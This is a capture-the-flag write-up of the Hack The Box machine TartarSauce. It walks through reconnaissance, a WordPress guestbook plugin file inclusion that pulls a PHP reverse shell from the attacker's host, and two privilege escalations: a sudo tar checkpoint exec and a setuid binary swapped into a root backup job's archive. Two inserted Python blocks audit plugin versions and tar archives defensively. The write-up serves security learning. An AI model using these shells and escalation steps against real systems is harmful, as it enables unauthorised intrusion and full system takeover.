Hack The Box: TartarSauce Write-up (#15)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.88
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 80: running HTTP service (Apache 2.4.18 Ubuntu)
Nmap scan report for 10.10.10.88
Host is up, received user-set (0.013s latency).
Scanned at 2020-08-30 15:41:35 +08 for 41s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
nmap -sU -O --top-ports=20 -oA nmap/udp 10.10.10.88
  • -sU: UDP scan
Nmap scan report for 10.10.10.88
Host is up, received user-set (0.011s latency).
Scanned at 2020-08-30 15:41:35 +08 for 183s
PORT STATE SERVICE REASON VERSION
53/udp closed domain port-unreach ttl 63
67/udp open|filtered dhcps no-response
68/udp closed dhcpc port-unreach ttl 63
69/udp closed tftp port-unreach ttl 63
123/udp open|filtered ntp no-response
135/udp closed msrpc port-unreach ttl 63
137/udp closed netbios-ns port-unreach ttl 63
138/udp open|filtered netbios-dgm no-response
139/udp closed netbios-ssn port-unreach ttl 63
161/udp closed snmp port-unreach ttl 63
162/udp closed snmptrap port-unreach ttl 63
445/udp closed microsoft-ds port-unreach ttl 63
500/udp closed isakmp port-unreach ttl 63
514/udp closed syslog port-unreach ttl 63
520/udp closed route port-unreach ttl 63
631/udp open|filtered ipp no-response
1434/udp closed ms-sql-m port-unreach ttl 63
1900/udp open|filtered upnp no-response
4500/udp open|filtered nat-t-ike no-response
49152/udp open|filtered unknown no-response
...

Service Enumeration

Port 80 (HTTP)

/robots.txt
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.88/webservices/monstra-3.0.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e txt,php -x 404,403
  • -u: Target URL
  • -w: Wordlist
  • -e: File extension
  • -x: Status code to exclude
Searchsploit
...SNIP...
[15:48:02] 200 - 4KB - /webservices/monstra-3.0.4/
[15:48:02] 301 - 337B - /webservices/monstra-3.0.4/public -> http://10.10.10.88/webservices/monstra-3.0.4/public/
[15:48:02] 301 - 336B - /webservices/monstra-3.0.4/admin -> http://10.10.10.88/webservices/monstra-3.0.4/admin/
[15:48:03] 301 - 338B - /webservices/monstra-3.0.4/storage -> http://10.10.10.88/webservices/monstra-3.0.4/storage/
[15:48:03] 301 - 338B - /webservices/monstra-3.0.4/plugins -> http://10.10.10.88/webservices/monstra-3.0.4/plugins/
[15:48:03] 301 - 337B - /webservices/monstra-3.0.4/engine -> http://10.10.10.88/webservices/monstra-3.0.4/engine/
[15:48:04] 301 - 340B - /webservices/monstra-3.0.4/libraries -> http://10.10.10.88/webservices/monstra-3.0.4/libraries/
[15:48:06] 301 - 334B - /webservices/monstra-3.0.4/tmp -> http://10.10.10.88/webservices/monstra-3.0.4/tmp/
[15:48:15] 301 - 335B - /webservices/monstra-3.0.4/boot -> http://10.10.10.88/webservices/monstra-3.0.4/boot/
[15:48:17] 301 - 338B - /webservices/monstra-3.0.4/backups -> http://10.10.10.88/webservices/monstra-3.0.4/backups/

Task Completed
Admin login page
python3 /opt/dirsearch/dirsearch.py -u 10.10.10.88/webservices/ -e txt,php -x 404
....
[18:54:15] 301 - 319B - /webservices/wp -> http://10.10.10.88/webservices/wp/
....
WordPress site
Broken link
View Page Source
root@kali:/htb/TartarSauce# python3 /opt/dirsearch/dirsearch.py -u 10.10.10.88/webservices/wp/ -e txt,php -x 404,403,500
...SNIP...
[20:01:29] Starting:
[20:01:34] 301 - 0B - /webservices/wp/index.php -> http://10.10.10.88/webservices/wp/
[20:01:34] 200 - 19KB - /webservices/wp/license.txt
[20:01:35] 200 - 7KB - /webservices/wp/readme.html
[20:01:37] 301 - 328B - /webservices/wp/wp-admin -> http://10.10.10.88/webservices/wp/wp-admin/
[20:01:37] 301 - 330B - /webservices/wp/wp-content -> http://10.10.10.88/webservices/wp/wp-content/
[20:01:37] 200 - 0B - /webservices/wp/wp-content/
[20:01:37] 200 - 69B - /webservices/wp/wp-content/plugins/akismet/akismet.php
[20:01:37] 302 - 0B - /webservices/wp/wp-admin/ -> http:/10.10.10.88/webservices/wp/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.88%2Fwebservices%2Fwp%2Fwp-admin%2F&reauth=1
[20:01:37] 301 - 331B - /webservices/wp/wp-includes -> http://10.10.10.88/webservices/wp/wp-includes/
[20:01:37] 200 - 1KB - /webservices/wp/wp-admin/install.php
[20:01:37] 200 - 2KB - /webservices/wp/wp-login.php
[20:01:37] 405 - 42B - /webservices/wp/xmlrpc.php
wpscan --api-token '<Your API Token>' --url http://10.10.10.88/webservices/wp -e ap --plugins-detection aggressive
  • --api-token: Personal API token.
  • --url: Target URL.
  • -e: Enumeration option.
  • --plugins-detection: Use the supplied mode to enumerate plugins.
[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'
...SNIP...
[i] Plugin(s) Identified:
[+] akismet
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
| Last Updated: 2020-08-10T16:49:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 4.1.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
|
| Version: 4.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
...SNIP...
[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| Last Updated: 2020-08-10T09:52:00.000Z
| Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.0.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
| Fixed in: 2.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/9109
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17884
| - https://seclists.org/fulldisclosure/2018/Jul/89
| - http://www.defensecode.com/advisories/DC-2018-05-008_WordPress_Gwolle_Guestbook_Plugin_Advisory.pdf
| - https://plugins.trac.wordpress.org/changeset/1888023/gwolle-gb
|
| Version: 2.3.10 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
Searchsploit
searchsploit -m php/webapps/38861.txt
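Added example (my own Python, not wpscan's code and nothing from the box): it reproduces the two readme checks wpscan reported above, "Readme - Stable Tag" and "Readme - ChangeLog Section", on a constructed readme.txt, cross-checks the two sections against each other, and compares the result with the fixed-in version from the scan. SAMPLE_README, FIXED_IN and all function names are assumptions.

```python
import re

# Constructed readme.txt (not fetched from the box) in the layout WordPress
# plugins use: a "Stable tag:" header and a "== Changelog ==" section.
SAMPLE_README = """=== Gwolle Guestbook ===
Stable tag: 2.3.10

== Changelog ==

= 2.3.10 =
* bug fixes

= 2.3.9 =
* earlier release
"""

# Fixed-in version wpscan reported for CVE-2018-17884 (from the scan above).
FIXED_IN = {"gwolle-gb": "2.5.4"}

def parse_version(text):
    """Dotted version string -> tuple of ints, so 2.10 sorts after 2.9."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def stable_tag(readme):
    """Version declared in the 'Stable tag:' header line, or None."""
    m = re.search(r"^Stable tag:\s*([\w.\-]+)", readme, re.M | re.I)
    return m.group(1) if m else None

def changelog_top(readme):
    """First '= x.y.z =' heading after '== Changelog ==', or None."""
    m = re.search(r"^==\s*Changelog\s*==(.*)", readme, re.M | re.I | re.S)
    if not m:
        return None
    v = re.search(r"^=\s*([\d.]+)\s*=", m.group(1), re.M)
    return v.group(1) if v else None

def assess_plugin(slug, readme, fixed_in=FIXED_IN):
    """Return (version, source, below_fix) for one plugin readme."""
    # Both sections are read and compared: the file is plain text that
    # may have been edited by hand, so one source alone is weak evidence.
    tag, log = stable_tag(readme), changelog_top(readme)
    version = tag or log
    if version is None:
        return None, None, None
    source = "stable tag" if tag else "changelog"
    if tag and log and tag != log:
        source += " (changelog disagrees: %s)" % log
    below_fix = slug in fixed_in and parse_version(version) < parse_version(fixed_in[slug])
    return version, source, bool(below_fix)
```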

Exploitation

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php wp-load.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.10'; // CHANGE THIS
$port = 53; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
root@kali:/htb/TartarSauce# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
root@kali:/htb/TartarSauce# nc -nlvp 53
listening on [any] 53 ...
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.10/
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
root@kali:/htb/TartarSauce# stty raw -echo;fg
nc -nlvp 53
www-data@TartarSauce:/$
export TERM=xterm-color

Post-Exploitation Enumeration

./lse -l 1 -i

Privilege Escalation #1

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

Privilege Escalation #2

onuma@TartarSauce:/tmp$ file /usr/sbin/backuperer
/usr/sbin/backuperer: Bourne-Again shell script, UTF-8 Unicode text executable
onuma@TartarSauce:/tmp$ ls -l /usr/sbin/backuperer
-rwxr-xr-x 1 root root 1701 Feb 21 2018 /usr/sbin/backuperer
./LinEnum.sh
onuma@TartarSauce:/tmp$ cat /lib/systemd/system/backuperer.service
[Unit]
Description=Backuperer
[Service]
ExecStart=/usr/sbin/backuperer
onuma@TartarSauce:/tmp$ cat /usr/sbin/backuperer 
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{
for n in $(seq 72);
do /usr/bin/printf $"-";
done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
else
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0
fi
  1. It recursively deletes the temporary files/directories left by the previous run (/var/tmp/.* and /var/tmp/check).
  2. It archives and compresses the files under /var/www/html and saves the result as /var/tmp/.<random sha1 value>.
  3. It sleeps for 30 seconds.
  4. It creates the directory /var/tmp/check.
  5. It extracts /var/tmp/.<random sha1 value> into /var/tmp/check.
  6. It performs an integrity check between /var/www/html and /var/tmp/check/var/www/html. If there is any difference, it reports an error. Otherwise it moves /var/tmp/.<random sha1 value> to /var/backups/onuma-www-dev.bak and then recursively removes everything under /var/tmp/check/ and the /var/tmp/.<random sha1 value> file (the ".*" in the script).
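Added example (my own Python, not the box's script or the author's code): the weakness in backuperer is that root extracts, with ownership and permissions preserved, an archive staged in a world-writable directory where a lower-privileged user can replace it during the 30-second sleep. The block builds a constructed archive in memory containing a set-id file and a path-traversal entry and shows the audit a privileged backup or restore job should run before extracting; the function names, member names and placeholder file contents are assumptions.

```python
import io
import stat
import tarfile

def build_sample_archive():
    """Constructed tar.gz (built in memory, not taken from the box) holding a
    setuid/setgid file under var/www/html plus a path-traversal entry."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        payload = b"placeholder-binary"
        info = tarfile.TarInfo("var/www/html/setuid")
        info.size, info.mode = len(payload), 0o6755   # -rwsr-sr-x
        tar.addfile(info, io.BytesIO(payload))
        info = tarfile.TarInfo("../escape.txt")
        info.mode = 0o644
        tar.addfile(info, io.BytesIO(b""))
    return buf.getvalue()

def _escapes(path):
    """True for absolute paths or any '..' component."""
    return path.startswith("/") or ".." in path.split("/")

def audit_archive(data):
    """List (member, reason) pairs a privileged extraction should refuse:
    set-id files, paths leaving the extraction root, links pointing out."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.isfile() and m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((m.name, "setuid/setgid bit set"))
            if _escapes(m.name):
                findings.append((m.name, "path escapes extraction root"))
            if (m.issym() or m.islnk()) and _escapes(m.linkname):
                findings.append((m.name, "link target escapes root"))
    return findings

def safe_extract(data, dest):
    """Refuse a dirty archive; otherwise extract with the set-id bits
    cleared, since an extraction run as root would keep them as-is."""
    if audit_archive(data):
        raise ValueError("archive rejected by audit")
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            m.mode &= ~(stat.S_ISUID | stat.S_ISGID)
            tar.extract(m, dest)
```

The same audit is the reason the staging directory should not be world-writable in the first place: a private directory created with mktemp -d removes the window the script leaves open.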
onuma@TartarSauce:/var/tmp$ uname -a
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setuid(0);                /* the binary is setuid root, so become root */
    system("/bin/bash -p");
    return 0;
}
gcc -m32 -o setuid setuid.c
root@kali:/htb/TartarSauce/var/www/html# chmod +s setuid
root@kali:/htb/TartarSauce/var/www/html# ls -ltr
total 16K
-rwsr-sr-x 1 root root 16K Aug 31 12:54 setuid
root@kali:/htb/TartarSauce# tar -zcvf exploit var/
var/
var/www/
var/www/html/
var/www/html/setuid
python3 -m http.server 80
onuma@TartarSauce:/var/tmp$ wget http://10.10.14.10/exploit
--2020-08-31 01:04:14-- http://10.10.14.10/exploit
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2761 (2.7K) [application/octet-stream]
Saving to: 'exploit'
exploit 100%[===================>] 2.70K --.-KB/s in 0s
2020-08-31 01:04:14 (301 MB/s) - 'exploit' saved [2761/2761]
systemctl list-timers
onuma@TartarSauce:/var/tmp$ ll
total 44
drwxrwxrwt 9 root root 4096 Aug 31 01:08 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:08 .c58430b363fa15856dcd269d38a9bdb29b419baa
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:03 exploit
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS/
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td/
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER/
drwx------ 3 root root 4096 Aug 30 09:56 systemd-private-e06751decbfd46c6b758f30aeee90b77-systemd-timesyncd.service-Fn6Ryx/
cp exploit .c58430b363fa15856dcd269d38a9bdb29b419baa
onuma@TartarSauce:/var/tmp$ ls -ltr
total 44
drwxrwxrwt 9 root root 4096 Aug 31 01:08 ./
drwxr-xr-x 14 root root 4096 Feb 9 2018 ../
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:08 .c58430b363fa15856dcd269d38a9bdb29b419baa
drwxr-xr-x 3 root root 4096 Aug 31 01:08 check/
-rw-r--r-- 1 onuma onuma 2761 Aug 31 01:03 exploit
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -ltr
total 24
drwxr-xr-x 2 root root 4096 Aug 31 00:56 ./
drwxr-xr-x 3 root root 4096 Aug 31 00:52 ../
-rwsr-sr-x 1 root root 15524 Aug 31 00:54 setuid
onuma@TartarSauce:/var/tmp/check/var/www/html$ ./setuid -p
root@TartarSauce:/var/tmp/check/var/www/html#

Attack Strategy Map

Joshua Surendran